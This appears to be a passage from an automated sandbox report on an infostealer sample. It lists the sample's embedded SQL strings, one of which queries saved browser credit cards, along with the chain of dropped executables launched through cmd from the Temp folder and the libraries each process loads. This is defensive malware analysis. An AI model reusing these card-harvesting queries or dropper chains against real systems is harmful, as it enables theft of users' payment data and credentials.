Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2342061911.0000000023481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2322457634.0000000001B51000.00000004.00000020.00020000.00000000.sdmp, BFBGHDGCFHIDBGDGIIIE.0.dr, GHDBKFHIJKJKECAAAECA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 47%
Source: CFBAKEHIEB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sspicli.dll
